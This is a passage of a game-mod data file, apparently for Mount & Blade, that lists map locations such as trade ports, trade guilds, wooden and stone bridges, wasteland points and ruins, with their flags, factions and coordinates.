("tradeport107", "Angra do heroismo", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (523.34, -165.38), [], 270.0),
("tradeport108", "Farsund", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (157.04, -453.92), [], 135.0),
("tradeport109", "Antalaha", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-319.72, 387.96), [], 315.0),
("tradeport_end", "tradeport end", icon_cantsee|pf_disabled|pf_is_static|pf_no_label|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("tradeguild1", "Turpan", icon_house_exn|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-744.84, -219.96), [], 145.0),
("tradeguild2", "Changzhou", icon_house_exn|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-1046.84, -160.52), [], 15.0),
("tradeguild3", "Thai Nguyen", icon_house_exn|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-926.28, 27.92), [], 265.0),
("tradeguild4", "Enshi", icon_house_exn|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-966.36, -66.4), [], 115.0),
("tradeguild5", "Huelun", icon_house_exn|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-1077.62, -304.6), [], 45.0),
("tradeguild6", "Fuxin", icon_house_exn|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-1099.4, -207.96), [], 275.0),
("tradeguild7", "Gorgan", icon_house_exn|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-364.96, -142.56), [], 35.0),
("tradeguild8", "Abadeh", icon_house_exn|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-345.36, -76.36), [], 225.0),
("tradeguild9", "Adrar", icon_house_exn|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (232.96, -39.56), [], 95.0),
("tradeguild10", "Linz", icon_house_exn|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (73.64, -294.68), [], 175.0),
("tradeguild11", "Garrotxa", icon_house_exn|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (202.52, -210.12), [], 45.0),
("tradeguild12", "Ales", icon_house_exn|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (184.88, -236.04), [], 25.0),
("tradeguild13", "Brest", icon_house_exn|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-28.84, -352.84), [], 75.0),
("tradeguild14", "Ternopil", icon_house_exn|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-50.0, -313.08), [], 145.0),
("tradeguild15", "Al Bukamal", icon_house_exn|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-217.36, -115.32), [], 325.0),
("tradeguild16", "Elverum", icon_house_exn|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (103.2, -507.44), [], 115.0),
("tradeguild17", "Shumen", icon_house_exn|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-64.6, -224.6), [], 225.0),
("tradeguild18", "Ahbaz", icon_house_exn|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-302.08, -78.08), [], 270.0),
("tradeguild19", "Dhaka", icon_house_exn|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-758.08, 5.2), [], 75.0),
("tradeguild20", "Uliastai", icon_house_exn|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-831.4, -292.88), [], 195.0),
("tradeguild_end", "tradeguild end", icon_cantsee|pf_disabled|pf_is_static|pf_no_label|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (48.0, 48.0), []),
("bridge_1", "{!}1", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1304.0, -130.8), [], 335.0),
("bridge_2", "{!}2", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1174.2, -126.2), [], 90.0),
("bridge_3", "{!}3", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1019.58, -267.12), [], 40.0),
("bridge_4", "{!}4", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1131.2, -186.2), [], 40.0),
("bridge_5", "{!}5", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1182.2, -211.2), [], 40.0),
("bridge_6", "{!}6", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1103.4, -196.94), [], 40.0),
("bridge_7", "{!}7", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1121.76, -217.25), [], 100.0),
("bridge_8", "{!}8", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1091.14, -216.18), []),
("bridge_9", "{!}9", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1220.28, -288.88), [], 70.0),
("bridge_10", "{!}10", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1084.14, -43.58), [], 145.0),
("bridge_11", "{!}11", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1084.18, -66.24), [], 45.0),
("bridge_12", "{!}12", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1000.22, -154.22), [], 80.0),
("bridge_13", "{!}13", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1048.32, -176.34), [], 140.0),
("bridge_14", "{!}14", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1226.04, -177.54), [], 100.0),
("bridge_15", "{!}15", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1253.8, -92.74), [], 105.0),
("bridge_16", "{!}16", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1224.32, -95.52), [], 105.0),
("bridge_17", "{!}17", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (228.72, 82.76), [], 115.0),
("bridge_18", "{!}18", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (284.9, 102.96), [], 195.0),
("bridge_19", "{!}19", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (156.56, 185.86), [], 75.0),
("bridge_20", "{!}20", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-996.1, -86.88), [], 340.0),
("bridge_21", "{!}21", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-906.336, -126.5336), [], 45.0),
("bridge_22", "{!}22", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-924.72, -88.28), [], 280.0),
("bridge_23", "{!}23", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-935.28, -57.68), [], 45.0),
("bridge_24", "{!}24", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-899.9, -37.98), [], 260.0),
("bridge_25", "{!}25", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-920.16, 29.38), [], 95.0),
("bridge_26", "{!}26", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1059.24, -110.36), [], 330.0),
("bridge_27", "{!}27", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-984.34, -168.48), [], 75.0),
("bridge_28", "{!}28", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-932.8, -164.68), [], 75.0),
("bridge_29", "{!}29", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-988.78, -50.68), [], 30.0),
("bridge_30", "{!}30", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1023.22, -14.46), [], 45.0),
("bridge_31", "{!}31", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1178.78, -131.38), []),
("bridge_32", "{!}32", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1037.48, -2.62), [], 100.0),
("bridge_33", "{!}33", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1074.86, -93.6), [], 135.0),
("bridge_34", "{!}34", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-895.78, -397.18), [], 110.0),
("bridge_35", "{!}35", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-672.32, -319.64), [], 160.0),
("bridge_36", "{!}36", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-644.24, -231.7), [], 170.0),
("bridge_37", "{!}37", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-451.824, -186.734), [], 115.0),
("bridge_38", "{!}38", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-490.22, -242.38), [], 330.0),
("bridge_39", "{!}39", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-338.98, -279.98), [], 260.0),
("bridge_40", "{!}40", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-267.46, -297.68), []),
("bridge_41", "{!}41", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-297.22, -359.04), [], 90.0),
("bridge_42", "{!}42", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-218.24, -284.58), [], 40.0),
("bridge_43", "{!}43", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-35.84, -431.28), [], 165.0),
("bridge_44", "{!}44", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-144.64, -301.52), [], 145.0),
("bridge_45", "{!}45", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (21.82, -379.28), [], 90.0),
("bridge_46", "{!}46", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (73.66, -377.06), [], 90.0),
("bridge_47", "{!}47", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (7.54, -249.88), [], 135.0),
("bridge_48", "{!}48", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (136.22, -270.24), [], 20.0),
("bridge_49", "{!}49", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (263.62, -217.34), [], 105.0),
("bridge_50", "{!}50", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-106.66, -72.68), [], 100.0),
("bridge_51", "{!}51", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-112.92, -59.76), [], 90.0),
("bridge_52", "{!}52", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-116.32, -26.08), [], 120.0),
("bridge_53", "{!}53", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-129.32, -8.72), [], 105.0),
("bridge_54", "{!}54", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-103.04, 50.54), [], 95.0),
("bridge_55", "{!}55", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-517.5, -9.3), [], 90.0),
("bridge_56", "{!}56", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-549.28, -63.08), [], 75.0),
("bridge_57", "{!}57", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-597.46, 14.52), [], 100.0),
("bridge_58", "{!}58", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-573.18, 25.74), []),
("bridge_59", "{!}59", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-626.04, 85.68), [], 100.0),
("bridge_60", "{!}60", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-671.64, -10.34), [], 170.0),
("bridge_61", "{!}61", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-760.96, 13.86), [], 105.0),
("bridge_62", "{!}62", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-749.08, -8.16), [], 85.0),
("bridge_63", "{!}63", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-811.62, 27.4), [], 130.0),
("bridge_64", "{!}64", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-805.78, 35.38), [], 105.0),
("bridge_65", "{!}65", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-928.08, 107.04), [], 100.0),
("bridge_wood_end", "Bridge wood end", icon_cantsee|pf_disabled|pf_is_static|pf_no_label|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (64.0, 52.0), []),
("bridge_stone_1", "{!}1", icon_bridge_stone|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1157.4, -153.8), []),
("bridge_stone_2", "{!}2", icon_bridge_stone|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1018.14, -121.12), [], 20.0),
("bridge_stone_3", "{!}3", icon_bridge_stone|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-964.82, -110.16), [], 75.0),
("bridge_stone_4", "{!}4", icon_bridge_stone|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-944.96, -113.62), [], 340.0),
("bridge_stone_5", "{!}5", icon_bridge_stone|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-967.64, -114.16), []),
("bridge_stone_6", "{!}6", icon_bridge_stone|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-985.38, -69.88), [], 330.0),
("bridge_stone_7", "{!}7", icon_bridge_stone|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1043.0, -91.82), [], 20.0),
("bridge_stone_8", "{!}8", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (8.3, -356.58), [], 170.0),
("bridge_stone_9", "{!}9", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-63.92, -235.78), [], 5.0),
("bridge_stone_10", "{!}10", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (7.84, -250.62), [], 100.0),
("bridge_stone_11", "{!}11", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (71.02, -262.86), [], 90.0),
("bridge_stone_12", "{!}12", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (88.0, -280.1), []),
("bridge_stone_13", "{!}13", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (174.28, -231.68), [], 90.0),
("bridge_stone_14", "{!}14", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (106.5, -369.9), [], 140.0),
("bridge_stone_15", "{!}15", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (178.56, -345.4), [], 155.0),
("bridge_stone_16", "{!}16", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (144.88, -321.42), [], 120.0),
("bridge_stone_17", "{!}17", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (221.92, -191.98), [], 10.0),
("bridge_stone_18", "{!}18", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (319.12, -198.68), [], 170.0),
("bridge_stone_19", "{!}19", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (327.8, -166.72), [], 40.0),
("bridge_stone_20", "{!}20", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (283.28, -179.12), [], 10.0),
("bridge_stone_21", "{!}21", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-252.92, -92.58), [], 100.0),
("bridge_stone_22", "{!}22", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-262.32, -96.42), [], 160.0),
("bridge_stone_23", "{!}23", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-299.32, -65.58), [], 100.0),
("bridge_stone_24", "{!}24", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-624.6, -24.38), [], 10.0),
("bridge_stone_25", "{!}25", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (292.72, -148.4), [], 30.0),
("bridge_stone_26", "{!}26", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (226.92, -279.34), [], 175.0),
("bridge_stone_27", "{!}27", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (211.42, -305.06), [], 150.0),
("bridge_stone_28", "{!}28", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1147.36, -169.28), [], 20.0),
("bridge_stone_end", "Bridge stone end", icon_cantsee|pf_disabled|pf_is_static|pf_no_label|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (52.0, 64.0), []),
("wasteland1", "Wasteland Santo domingo", icon_point_mark|pf_label_medium|pf_village, no_menu, pt_none, fac_hot_points, aggressiveness_0, ai_bhvr_hold, 0, (997.9, 59.66), []),
("wasteland2", "Wasteland South hedland", icon_point_mark|pf_label_medium|pf_village, no_menu, pt_none, fac_hot_points, aggressiveness_0, ai_bhvr_hold, 0, (-1068.16, 446.68), []),
("wasteland3", "Wasteland Darwin", icon_point_mark|pf_label_medium|pf_village, no_menu, pt_none, fac_hot_points, aggressiveness_0, ai_bhvr_hold, 0, (-1201.28, 366.12), []),
("wasteland4", "Wasteland Nashville", icon_point_mark|pf_label_medium|pf_village, no_menu, pt_none, fac_hot_points, aggressiveness_0, ai_bhvr_hold, 0, (1177.16, -134.92), []),
("wasteland5", "Wasteland Wilmington", icon_point_mark|pf_label_medium|pf_village, no_menu, pt_none, fac_hot_points, aggressiveness_0, ai_bhvr_hold, 0, (1080.6, -111.56), []),
("wasteland6", "Wasteland Saint Augustine", icon_point_mark|pf_label_medium|pf_village, no_menu, pt_none, fac_hot_points, aggressiveness_0, ai_bhvr_hold, 0, (1117.88, -62.2), []),
("wasteland7", "Wasteland Oklahoma", icon_point_mark|pf_label_medium|pf_village, no_menu, pt_none, fac_hot_points, aggressiveness_0, ai_bhvr_hold, 0, (1294.36, -126.72), []),
("wasteland8", "Wasteland Kansas", icon_point_mark|pf_label_medium|pf_village, no_menu, pt_none, fac_hot_points, aggressiveness_0, ai_bhvr_hold, 0, (1262.32, -171.0), []),
("wasteland9", "Wasteland Hauston", icon_point_mark|pf_label_medium|pf_village, no_menu, pt_none, fac_hot_points, aggressiveness_0, ai_bhvr_hold, 0, (1271.24, -61.04), []),
("wasteland10", "Wasteland Santa clara", icon_point_mark|pf_label_medium|pf_village, no_menu, pt_none, fac_hot_points, aggressiveness_0, ai_bhvr_hold, 0, (1102.24, 19.04), []),
("wasteland11", "Wasteland New orleans", icon_point_mark|pf_label_medium|pf_village, no_menu, pt_none, fac_hot_points, aggressiveness_0, ai_bhvr_hold, 0, (1214.32, -62.04), []),
("wasteland12", "Wasteland Rio de janeiro", icon_point_mark|pf_label_medium|pf_village, no_menu, pt_none, fac_hot_points, aggressiveness_0, ai_bhvr_hold, 0, (702.2, 470.4), []),
("wasteland13", "Wasteland Salvador", icon_point_mark|pf_label_medium|pf_village, no_menu, pt_none, fac_hot_points, aggressiveness_0, ai_bhvr_hold, 0, (648.64, 366.78), []),
("wasteland14", "Wasteland Reykjabik", icon_point_mark|pf_label_medium|pf_village, no_menu, pt_none, fac_hot_points, aggressiveness_0, ai_bhvr_hold, 0, (469.14, -574.7), []),
("wasteland15", "Wasteland Vinland", icon_point_mark|pf_label_medium|pf_village, no_menu, pt_none, fac_hot_points, aggressiveness_0, ai_bhvr_hold, 0, (852.12, -326.56), []),
("wasteland16", "Wasteland Brattalid", icon_point_mark|pf_label_medium|pf_village, no_menu, pt_none, fac_hot_points, aggressiveness_0, ai_bhvr_hold, 0, (720.12, -493.96), []),
("ruin_1", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (27.08, 593.92), []),
("ruin_2", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1183.62, -131.16), []),
("ruin_3", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-107.96, -62.92), []),
("ruin_4", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-27.32, -159.2), []),
("ruin_5", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (112.0, -228.0), []),
("ruin_6", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (92.0, -212.0), []),
("ruin_7", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (260.0, -220.0), []),
("ruin_8", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-19.0, -164.0), []),
("ruin_9", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (249.2, -340.0), []),
("ruin_10", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-120.0, -12.0), []),
("ruin_11", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1042.4, -202.4), []),
("ruin_12", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-38.0, -124.0), []),
("ruin_13", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-58.46, -179.66), []),
("ruin_14", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (246.8, -299.2), []),
